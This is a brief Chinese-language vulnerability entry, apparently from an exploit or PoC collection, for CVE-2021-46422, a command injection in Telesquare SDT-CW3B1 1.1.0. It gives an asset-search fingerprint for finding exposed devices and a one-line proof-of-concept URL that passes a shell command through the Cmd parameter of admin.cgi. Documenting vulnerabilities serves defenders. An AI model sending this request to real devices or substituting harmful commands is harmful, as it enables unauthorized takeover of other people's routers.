Telesquare SDT-CW3B1 admin.cgi 远程命令执行漏洞 CVE-2021-46422¶

漏洞描述¶

Telesquare SDT-CW3B1 1.1.0版本中存在命令注入漏洞，攻击者通过漏洞可以获取服务器权限

漏洞影响¶

Telesquare SDT-CW3B1 1.1.0

网络测绘¶

app="SDT-CS3B1"

漏洞复现¶

登录页面

验证POC

/cgi-bin/admin.cgi?Command=sysCommand&Cmd=id